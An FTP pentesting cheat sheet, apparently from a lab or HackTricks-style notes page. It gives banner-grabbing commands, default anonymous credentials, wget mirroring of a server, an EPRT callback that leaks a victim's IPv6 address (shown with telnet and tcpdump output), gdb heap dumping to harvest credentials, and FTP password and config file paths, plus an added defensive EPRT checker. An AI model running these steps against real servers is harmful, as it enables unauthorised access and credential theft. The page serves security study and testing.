# 21 - FTP

### Banner Grabbing

```bash
nc -vn <IP> 21
openssl s_client -connect somesite.com:21 -starttls ftp
```

### Anonymous Login

```bash
anonymous : anonymous
anonymous :
ftp : ftp
```

### Download All Files

```bash
wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98
```

### Force IPv6 Callback

RFC 2428 describes the **EPRT** command, which can be used to make the server connect to another host. The following are sample EPRT commands:

```bash
 EPRT |1|132.235.1.2|6275|
 EPRT |2|1080::8:800:200C:417A|5282|
```

EPRT can be used to make a victim FTP server send a connection back **to our attacking device**, which discloses the victim's IPv6 address. EPRT isn't a "normal" FTP command, it is a raw FTP command, so instead of using an FTP client you need to connect to port 21 with telnet.

```bash
$ telnet zetta.htb 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
USER 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
331 User 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required
PASS 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
EPRT |2|dead:beef:2::1008|4488|        // my IPv6 address
200-FXP transfer: from 10.10.14.10 to dead:beef:2::1008%160
200 PORT command successful
LIST
425 Could not open data connection to port 4488: Connection refused
```

Capture the incoming IPv6 address with `tcpdump`.

```bash
$ tcpdump -i tun0 -vv ip6
tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:12:32.613603 IP6 (flowlabel 0x6bdb7, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:df29.37250 > kali.4488: Flags [S], cksum 0x64d3 (correct), seq 1305187145, win 28800, options [mss 1337,sackOK,TS val 374756922 ecr 0,nop,wscale 7], length 0
09:12:32.613626 IP6 (flowlabel 0xbe7b8, hlim 64, next-header TCP (6) payload length: 20) kali.4488 > dead:beef::250:56ff:feb9:df29.37250: Flags [R.], cksum 0xa938 (correct), seq 0, ack 1305187146, win 0, length 0
```

Victim IPv6 address: `dead:beef::250:56ff:feb9:df29`
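The callback above succeeds because the server accepted an EPRT address that differs from the control connection's peer (`10.10.14.10`). The following is an added example, not part of the original notes, of the server-side or log-review check that flags this; `parse_eprt` and `check_eprt` are hypothetical names, and the "low-port" rule is an assumed local policy.

```python
import ipaddress

AF_BY_PROTO = {"1": 4, "2": 6}  # RFC 2428 protocol numbers -> IP version

def parse_eprt(line):
    """Parse 'EPRT <d><proto><d><addr><d><port><d>' and return (ip, port)."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() != "EPRT" or len(arg) < 2:
        raise ValueError("not an EPRT command")
    fields = arg.split(arg[0])          # the first character is the delimiter
    if len(fields) != 5 or fields[0] or fields[4]:
        raise ValueError("wrong number of fields")
    proto, addr, port = fields[1:4]
    if proto not in AF_BY_PROTO:
        raise ValueError("unknown network protocol")
    ip = ipaddress.ip_address(addr)     # raises ValueError on a bad address
    if ip.version != AF_BY_PROTO[proto]:
        raise ValueError("address does not match declared protocol")
    if not (port.isascii() and port.isdigit() and 0 < int(port) < 65536):
        raise ValueError("bad port")
    return ip, int(port)

def _unmap(ip):
    # Dual-stack sockets can report IPv4 peers as ::ffff:a.b.c.d
    return ip.ipv4_mapped if ip.version == 6 and ip.ipv4_mapped else ip

def check_eprt(line, control_peer):
    """Classify an EPRT command seen on a control connection from control_peer."""
    try:
        ip, port = parse_eprt(line)
    except ValueError:
        return "malformed"
    if _unmap(ip) != _unmap(ipaddress.ip_address(control_peer)):
        return "mismatch"   # data connection aimed at a third address
    if port < 1024:
        return "low-port"   # assumed policy: no data connections to privileged ports
    return "ok"

if __name__ == "__main__":
    # Commands copied from this page, paired with constructed peer addresses.
    samples = [
        ("EPRT |2|dead:beef:2::1008|4488|", "10.10.14.10"),
        ("EPRT |1|132.235.1.2|6275|", "132.235.1.2"),
        ("EPRT |2|1080::8:800:200C:417A|5282|", "1080::8:800:200c:417a"),
    ]
    for cmd, peer in samples:
        print(f"{peer:24} {cmd:40} {check_eprt(cmd, peer)}")
```

A server that rejects every command classified as "mismatch" never opens the data connection, so its other addresses are not exposed this way.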

### Dumping Memory

Attach to the FTP process and dump its memory, in the hope of finding credentials.

```bash
$ gdb -p <FTP_PROCESS_PID>
# List the mappings and note the start and end addresses of the [heap] region
(gdb) info proc mappings
# Alternative to 'info proc mappings' to get the heap start-end addresses
(gdb) ! grep heap /proc/<PID>/maps
# Write the heap region to a file, then leave gdb
(gdb) dump memory /tmp/<name>.mem <START_HEAP> <END_HEAP>
(gdb) q
$ strings /tmp/<name>.mem
```

### Interesting Files

```
/etc/ftpusers
/etc/ftpd.conf
/etc/proftpd.conf
/etc/proftpd/proftpd.conf
/etc/proftpd/ftpd.passwd
/etc/vsftpd.conf
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
```

